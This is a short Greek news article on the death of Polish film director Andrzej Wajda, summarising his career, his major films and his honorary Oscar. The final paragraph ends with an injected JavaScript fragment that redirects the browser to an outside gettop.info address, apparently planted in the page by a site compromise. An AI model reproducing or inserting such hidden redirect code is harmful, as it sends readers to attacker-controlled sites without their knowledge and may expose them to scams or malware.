«Έφυγε» ο βραβευμένος με Όσκαρ Πολωνός σκηνοθέτης, Αντρέι Βάιντα

0
19

 

Σε ηλικία 90 ετών έφυγε από τη ζωή ο βραβευμένος με Όσκαρ Πολωνός σκηνοθέτης Αντρέι Βάιντα, όπως επιβεβαίωσε η Ένωση Πολωνών Σκηνοθετών.

Σκηνοθέτησε περισσότερες από 40 ταινίες σε μία καριέρα 60 ετών. Η σκηνοθετική διαδρομή του ήταν διαχρονική από το «Κανάλ» (Kanal) του 1956 και τον «Άνθρωπο από Μάρμαρο» του 1977, μέχρι τα πιο πρόσφατα έργα του: Κατίν του 2007 και «Βαλέσα – Η Δύναμη της Ελπίδας» του 2013, ενώ τα περισσότερα ήταν εμπνευσμένα από τα δύσκολα χρόνια του πολέμου στην Πολωνία και την κομμουνιστική ιστορία.

Το 2000 τού απονεμήθηκε τιμητικό Όσκαρ για τη συμβολή του στον παγκόσμιο κινηματογράφο.

Ο ίδιος, είχε πρόσφατα μεταφερθεί στο νοσοκομείο, ενώ σύμφωνα με ανεπιβεβαίωτες πληροφορίες πέθανε από πνευμονική ανεπάρκεια.

Η τελευταία ταινία του Powidoki (Afterimage) αφηγείται την ιστορία ενός Ζωγράφου, του Wladyslaw Strzeminski, ο οποίος υπέφερε από τη μεταπολεμική σταλινική κυβέρνηση στην Πολωνία. Ο σκηνοθέτης στηλίτευε την πολιτική παρέμβαση στην Τέχνη. Αυτή είναι η επίσημη επιλογή της Πολωνίας για την εκπροσώπηση στα Όσκαρ και την ξενόγλωσση ταινία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here